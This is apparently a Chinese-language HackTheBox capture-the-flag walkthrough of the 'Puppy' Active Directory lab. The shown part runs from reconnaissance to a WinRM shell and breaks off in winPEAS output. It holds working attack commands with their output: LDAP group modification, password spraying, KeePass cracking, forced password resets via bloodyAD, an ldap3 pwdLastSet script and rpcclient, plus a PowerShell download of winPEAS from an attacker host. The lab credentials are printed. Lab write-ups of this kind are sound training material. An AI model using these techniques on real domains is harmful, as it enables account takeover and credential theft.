htb-season8.1-puppy

信息收集

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# nmap -p- --min-rate 10000 -oN ports.txt 10.10.11.70
Nmap scan report for 10.10.11.70
Host is up (0.19s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
2049/tcp  open  nfs
3260/tcp  open  iscsi
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49674/tcp open  unknown
49692/tcp open  unknown
62521/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds                                                            

┌──(root㉿kali)-[~]
└─# nmap -sCV -p- --min-rate 10000 10.10.11.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-23 04:03 EDT
Host is up (0.18s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-23 14:40:50Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100003  2,3         2049/udp   nfs
|   100005  1,2,3       2049/udp   mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100024  1           2049/tcp   status
|_  100024  1           2049/udp   status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         Microsoft Windows RPC
62492/tcp open  msrpc         Microsoft Windows RPC
62521/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-07-23T14:41:51
|_  start_date: N/A
|_clock-skew: 6h36m23s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.86 seconds

给的用户名并不能进行WinRM（5985）登陆

smb利用一下

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# smbmap -H 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!'


    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
The NETBIOS connection with the remote host timed out.                                                                       
The NETBIOS connection with the remote host timed out.                                                                       
                                                                                                                             
[+] IP: 10.10.11.70:445 Name: 10.10.11.70               Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     NO ACCESS       DEV-SHARE for PUPPY-DEVS
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 
[*] Closed 1 connections      

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# crackmapexec smb 10.10.11.70 -u "levi.james" -p "KingofAkron2025\!" --users
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025! 
SMB         10.10.11.70     445    DC               [+] Enumerated domain user(s)
SMB         10.10.11.70     445    DC               PUPPY.HTB\steph.cooper_adm               badpwdcount: 2 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTB\steph.cooper                   badpwdcount: 5 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTB\jamie.williams                 badpwdcount: 5 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTB\adam.silver                    badpwdcount: 1 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTB\ant.edwards                    badpwdcount: 0 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTB\levi.james                     badpwdcount: 0 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTB\krbtgt                         badpwdcount: 0 desc: Key Distribution Center Service Account
SMB         10.10.11.70     445    DC               PUPPY.HTB\Guest                          badpwdcount: 0 desc: Built-in account for guest access to the computer/domain                                                                                                                                            
SMB         10.10.11.70     445    DC               PUPPY.HTB\Administrator                  badpwdcount: 0 desc: Built-in account for administering the computer/domain   

去看一下共享目录

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# smbclient //10.10.11.70/NETLOGON -U "levi.james"

Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Mar 21 01:33:44 2025
  ..                                  D        0  Wed Feb 19 06:46:56 2025

                5080575 blocks of size 4096. 1632326 blocks available

什么都没有

域名加入host文件

10.10.11.70   dc.puppy.htb dc puppy.htb

smb探测

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# smbmap -H 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!'


    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.11.70:445 Name: dc.puppy.htb              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     NO ACCESS       DEV-SHARE for PUPPY-DEVS
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
[*] Closed 1 connections                                                                                                   

bloodhoudn攻击路线分析

然后利用bloodhoudn进行一些枚举

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# bloodhound-python -d puppy.htb -dc dc.puppy.htb -u levi.james -p 'KingofAkron2025!' -c All -ns 10.10.11.70 --dns-timeout 15 --dns-tcp -o bloodhound.json

INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
ERROR: Unhandled exception in computer DC.PUPPY.HTB processing: The NETBIOS connection with the remote host timed out.
INFO: Traceback (most recent call last):

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# sudo neo4j console

Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2025-07-23 12:31:04.563+0000 INFO  Starting...
2025-07-23 12:31:05.319+0000 INFO  This instance is ServerId{7f6c1dca} (7f6c1dca-059c-4e0b-b189-7ba241b8a56d)
2025-07-23 12:31:07.107+0000 INFO  ======== Neo4j 4.4.26 ========
2025-07-23 12:31:09.136+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2025-07-23 12:31:09.136+0000 INFO  Updating the initial password in component 'security-users'
2025-07-23 12:31:09.445+0000 INFO  Bolt enabled on localhost:7687.
2025-07-23 12:31:10.918+0000 INFO  Remote interface available at http://localhost:7474/
2025-07-23 12:31:10.925+0000 INFO  id: 108D734EF023B8E7D0237E6A765BEE9A1E0C75B0D1C260D7A56C79C35E49FA81
2025-07-23 12:31:10.925+0000 INFO  name: system
2025-07-23 12:31:10.925+0000 INFO  creationDate: 2025-07-23T11:58:58.773Z
2025-07-23 12:31:10.925+0000 INFO  Started.

┌──(root㉿kali)-[/myift/BloodHound-linux-x64]
└─# ./BloodHound --no-sandbox
(node:6869) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron.  See https://github.com/electron/electron/issues/23506 for more information
(node:6933) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.

导入文件

LEVI.JAMES 是 HR@PUPPY.HTB 的成员 → MemberOf 边表示“属于该组”

HR@PUPPY.HTB 对 DEVELOPERS@PUPPY.HTB 拥有 GenericWrite 权限

意味着组 HR 的成员（也就是你现在的用户 LEVI.JAMES）可以修改 DEVELOPERS 组的某些属性

常见攻击利用方式：

向 DEVELOPERS 添加新成员（即使当前用户没有直接写权限，也可以通过组滥用做到）；

如果 DEVELOPERS 组中有高权限用户（如域管或服务账号），可以利用该组权限间接提升权限。

我们将自己加到DEVELOPERS组中

加之前

确认levi.james 的 Distinguished Name（DN）：

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# ldapsearch -x -H ldap://dc.puppy.htb -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -b "DC=puppy,DC=htb" "(sAMAccountName=levi.james)" dn

# extended LDIF
#
# LDAPv3
# base <DC=puppy,DC=htb> with scope subtree
# filter: (sAMAccountName=levi.james)
# requesting: dn 
#

# Levi B. James, MANPOWER, PUPPY.HTB
dn: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

# search reference
ref: ldap://ForestDnsZones.PUPPY.HTB/DC=ForestDnsZones,DC=PUPPY,DC=HTB

# search reference
ref: ldap://DomainDnsZones.PUPPY.HTB/DC=DomainDnsZones,DC=PUPPY,DC=HTB

# search reference
ref: ldap://PUPPY.HTB/CN=Configuration,DC=PUPPY,DC=HTB

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3
                                                                      

构造 LDIF 文件

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# vim add_to_developers.ldif
                                                                                                                                                           
┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# cat add_to_developers.ldif 
dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
changetype: modify
add: member
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB//这里就是DN
                                                                                                             

执行修改操作

                                              
┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# ldapmodify -x -H ldap://dc.puppy.htb -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -f add_to_developers.ldif
modifying entry "CN=DEVELOPERS,DC=PUPPY,DC=HTB"

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# ldapsearch -x -H ldap://dc.puppy.htb -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -b "CN=DEVELOPERS,DC=PUPPY,DC=HTB" member
# extended LDIF
#
# LDAPv3
# base <CN=DEVELOPERS,DC=PUPPY,DC=HTB> with scope subtree
# filter: (objectclass=*)
# requesting: member 
#

# DEVELOPERS, PUPPY.HTB
dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
member: CN=Jamie S. Williams,CN=Users,DC=PUPPY,DC=HTB
member: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
member: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

成功的将Levi B. James加入到了DEVELOPERS组

DEVELOPERS组的情况

全局看一下

有个adm账户

并且有一个

感觉这两个账户有关联

STEPH.COOPER@PUPPY.HTB 用户拥有远程登录权限，并且和域控管理员账号相关

先设置为高价值用户

密码喷洒

做一下密码喷洒

同步一下时间
┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# sudo apt install ntpdate -y
sudo ntpdate dc.puppy.htb
收集一下用户名
┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# cypher-shell -u neo4j -p '123456' "MATCH (u:User) RETURN split(u.name, '@')[0]" | tail -n +2 | sed 's/"//g' > users.txt

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# cat users.txt                                                                                                          
JAMIE.WILLIAMS
ADAM.SILVER
ANT.EDWARDS
LEVI.JAMES
KRBTGT
ADMINISTRATOR
STEPH.COOPER
GUEST
STEPH.COOPER_ADM
NT AUTHORITY

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# kerbrute passwordspray --dc dc.puppy.htb -d puppy.htb users.txt 'KingofAkron2025!' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 07/25/25 - Ronnie Flathers @ropnop

2025/07/25 09:03:28 >  Using KDC(s):
2025/07/25 09:03:28 >   dc.puppy.htb:88

2025/07/25 09:04:09 >  [!] NT AUTHORITY@puppy.htb:KingofAkron2025! - User does not exist
2025/07/25 09:04:10 >  [!] STEPH.COOPER_ADM@puppy.htb:KingofAkron2025! - Invalid password
2025/07/25 09:04:10 >  [!] ADAM.SILVER@puppy.htb:KingofAkron2025! - USER LOCKED OUT
2025/07/25 09:04:10 >  [!] GUEST@puppy.htb:KingofAkron2025! - USER LOCKED OUT
2025/07/25 09:04:10 >  [!] JAMIE.WILLIAMS@puppy.htb:KingofAkron2025! - Invalid password
2025/07/25 09:04:10 >  [!] STEPH.COOPER@puppy.htb:KingofAkron2025! - Invalid password
2025/07/25 09:04:10 >  [!] KRBTGT@puppy.htb:KingofAkron2025! - USER LOCKED OUT
2025/07/25 09:04:10 >  [!] ANT.EDWARDS@puppy.htb:KingofAkron2025! - Invalid password
2025/07/25 09:04:10 >  [!] ADMINISTRATOR@puppy.htb:KingofAkron2025! - Invalid password
2025/07/25 09:04:15 >  [+] VALID LOGIN:  LEVI.JAMES@puppy.htb:KingofAkron2025!
2025/07/25 09:04:15 >  Done! Tested 10 logins (1 successes) in 46.247 seconds
                                                                                   

发现一些用户是USER LOCKED OUT被锁定了包括我们DEVELOPERS组的ADAM.SILVER@puppy.htb

ant.edwards对ADAM.SILVER有完全控制权限

加入新的组后我们的smb权限变化

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# smbmap -H 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!'                                                                   


    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
The NETBIOS connection with the remote host timed out.                                                                       
                                                                                                                             
[+] IP: 10.10.11.70:445 Name: dc.puppy.htb              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     READ ONLY       DEV-SHARE for PUPPY-DEVS
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
[*] Closed 1 connections                                                                                                     

多了一个DEV可读

获取 recovery.kdbx

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# smbclient //10.10.11.70/DEV -U "levi.james"

Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sun Mar 23 03:07:57 2025
  ..                                  D        0  Sat Mar  8 11:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 03:09:12 2025
  Projects                            D        0  Sat Mar  8 11:53:36 2025
  recovery.kdbx                       A     2677  Tue Mar 11 22:25:46 2025

                5080575 blocks of size 4096. 1643044 blocks available
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> 

文件是加密的我们爆破密码

Keepass2john变种 keepass4brute爆破.kdbx文件

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# ./keepass4brute/keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 36/14344392 - Attempts per minute: 65 - Estimated time remaining: 21 weeks, 6 days
[+] Current attempt: liverpool

[*] Password found: liverpool

直接打开数据库看一下里面的信息

keepassxc

得到密码

HJKL2025!
Antman2025!
JamieLove2025!
ILY2025!
Steve2025!

再加上前面收集的可登录的账户

ANT.EDWARDS
STEPH.COOPER
STEPH.COOPER_ADM
ADMINISTRATOR
JAMIE.WILLIAMS

密码爆破

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# crackmapexec smb 10.10.11.70 -u use.txt -p passwd.txt 
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\ANT.EDWARDS:HJKL2025! STATUS_LOGON_FAILURE 
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\ANT.EDWARDS:Antman2025! 

得到ANT.EDWARDS:Antman2025!

上面我们就已经说过ANT.EDWARDS对adam有完全控制权限

我们直接去

获取ADAM用户

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 remove uac -f LOCKOUT -f ACCOUNTDISABLE adam.silver
[-] ['LOCKOUT', 'ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
                                                                                                             //启动了  adam.silver                                            
┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set owner adam.silver ant.edwards
[+] Old owner S-1-5-21-1487982659-1829050783-2281216199-512 is now replaced by ant.edwards on adam.silver
                                                                                                              //将adam.silver用户的“所有者”（Owner）属性，将其设置为 ant.edwards。                                      

然后修改ant.edwards的密码

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set password adam.silver Adam@2025!
Traceback (most recent call last):
  File "/root/.local/bin/bloodyAD", line 8, in <module>
    sys.exit(main())
             ~~~~^^
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/main.py", line 210, in main
    output = args.func(conn, **params)
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/cli_modules/set.py", line 273, in password
    raise e
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/cli_modules/set.py", line 118, in password
    conn.ldap.bloodymodify(target, {"unicodePwd": op_list})
    ~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/network/ldap.py", line 315, in bloodymodify
    raise err
msldap.commons.exceptions.LDAPModifyException: 
Password can't be changed before -1 day, 6:27:48.198356 because of the minimum password age policy.         

这个错误信息非常清晰地指出了问题所在：

1. msldap.commons.exceptions.LDAPModifyException: 这表示在执行 LDAP（轻量级目录访问协议）修改操作时发生了异常。bloodyAD 使用 LDAP 协议与 Active Directory 进行通信。

2. Password can't be changed before -1 day, 6:27:48.198356 because of the minimum password age policy.: 这是问题的关键。它说明：

   • “密码不能更改”：重置密码的操作被拒绝了。
   • “因为最小密码期限策略”：原因是 Active Directory 中存在一项安全策略，叫做**“最小密码期限”（Minimum Password Age）**。
   • “在 -1 天，6:27:48.198356 之前”：这表示 adam.silver 账户的密码在最近一次修改后，还没有达到域策略要求的最小使用时间。Active Directory 会强制用户在一定时间（例如，1 天、3 天等）内不能再次更改密码，以防止用户立即将密码改回旧密码，或频繁修改密码来规避其他安全策略。

   这里的 -1 day, 6:27:48.198356 可能表示距离允许修改密码的日期还差 1 天零 6 小时多，或者表示上次修改密码的时间是在 1 天多以前，但还没有达到域控制器规定的最小密码使用期限。通常，当一个账户的密码刚刚被重置或修改后，会进入一个“冷却期”，在这个期限内不允许再次修改。

   ---

绕过密码最短修改周期限制

通过需要修改pwdlastset的时间戳，来绕过这个限制

绕过原理：
当 pwdLastSet 属性被设置为 0 时，Active Directory 会认为该账户的密码从未设置过，或者处于需要立即更改的状态。在这种情况下，域控制器会忽略“最小密码期限”策略的检查，允许立即设置新密码。

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# vim pwdlastsetChagne.py
                                                                                                                                                           
┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# python3 pwdlastsetChagne.py
                                                                                                                                                           
┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# cat pwdlastsetChagne.py      
import ldap3
server = ldap3.Server('10.10.11.70', port =389, use_ssl = False)
connection = ldap3.Connection(server, 'CN=ANTHONY J. EDWARDS,DC=PUPPY,DC=HTB', 'Antman2025!', auto_bind=True)
connection.bind()
connection.extend.standard.who_am_i() # 保持这行代码，但移除后面的多余文本
connection.modify('CN=ADAM D. SILVER,CN=USERS,DC=PUPPY,DC=HTB',{'pwdLastSet': [(ldap3.MODIFY_REPLACE, ['0'])]})

然后继续执行修改密码

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set password adam.silver Adam@2025!
Traceback (most recent call last):
  File "/root/.local/bin/bloodyAD", line 8, in <module>
    sys.exit(main())
             ~~~~^^
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/main.py", line 210, in main
    output = args.func(conn, **params)
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/cli_modules/set.py", line 273, in password
    raise e
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/cli_modules/set.py", line 118, in password
    conn.ldap.bloodymodify(target, {"unicodePwd": op_list})
    ~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/network/ldap.py", line 315, in bloodymodify
    raise err
msldap.commons.exceptions.LDAPModifyException: Password can't be changed. It may be because the oldpass provided is not valid.
You can try to use another password change protocol such as smbpasswd, server error may be more explicit.                   

还是不行

不知道为什么没有权限,只有输入旧的密码才行

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# rpcclient -U 'puppy.htb\Ant.Edwards%Antman2025!' 10.10.11.70
rpcclient $> setuserinfo ADAM.SILVER 23 Password@987
rpcclient $> 

换了个方法直接成功了

winrm远程登录

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# bloodyAD --host dc.puppy.htb -d puppy.htb -u ant.edwards -p Antman2025! remove uac 'ADAM.SILVER' -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from ADAM.SILVER's userAccountControl
                                                                                                                                                           
┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# evil-winrm -i dc.puppy.htb -u adam.silver -p Password@987                                                         
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents> 
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ..
*Evil-WinRM* PS C:\Users\adam.silver> dir


    Directory: C:\Users\adam.silver


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         2/28/2025  12:31 PM                3D Objects
d-r---         2/28/2025  12:31 PM                Contacts
d-r---         3/12/2025  12:09 PM                Desktop
d-r---          3/5/2025  10:16 AM                Documents
d-r---         2/28/2025  12:31 PM                Downloads
d-r---         2/28/2025  12:31 PM                Favorites
d-r---         2/28/2025  12:31 PM                Links
d-r---         2/28/2025  12:31 PM                Music
d-r---         2/28/2025  12:31 PM                Pictures
d-r---         2/28/2025  12:31 PM                Saved Games
d-r---         2/28/2025  12:31 PM                Searches
d-r---         2/28/2025  12:31 PM                Videos


*Evil-WinRM* PS C:\Users\adam.silver> cd Desktop
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> dir


    Directory: C:\Users\adam.silver\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/28/2025  12:31 PM           2312 Microsoft Edge.lnk
-ar---         7/25/2025   7:11 AM             34 user.txt


*Evil-WinRM* PS C:\Users\adam.silver\Desktop> type user.txt
2d8************************

发现一个Microsoft Edge浏览器的链接

Microsoft Edge 浏览器会将用户保存的密码、Cookies 等敏感信息加密存储在本地文件中（例如在 `C:\Users\<username>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data` 和 `Cookies` 文件中）。

这些文件中的数据就是由 DPAPI 加密的。

我们上传一个Winpeas扫一下

*Evil-WinRM* PS C:\Users\adam.silver\Documents> (New-Object Net.WebClient).DownloadFile('http://10.10.14.41:8888/winPEASx64.exe','C:\Users\adam.silver\desktop\winPEASx64.exe')
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd C:\Users\adam.silver\desktop\
*Evil-WinRM* PS C:\Users\adam.silver\desktop> dir


    Directory: C:\Users\adam.silver\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/28/2025  12:31 PM           2312 Microsoft Edge.lnk
-ar---         7/25/2025   7:11 AM             34 user.txt
-a----         7/25/2025   9:21 AM         441344 winPEASx64.exe

*Evil-WinRM* PS C:\Users\adam.silver\desktop> ./winPEASx64.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
   Creating Dynamic lists, this could take a while, please wait...
   - Checking if domain...
   - Getting Win32_UserAccount info...
Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied
   at System.Management.ThreadDispatch.Start()                                                                                                             
   at System.Management.ManagementScope.Initialize()                                                                                                       
   at System.Management.ManagementObjectSearcher.Initialize()                                                                                              
   at System.Management.ManagementObjectSearcher.Get()                                                                                                     
   at b9.by()                                                                                                                                              
   - Creating current user groups list...
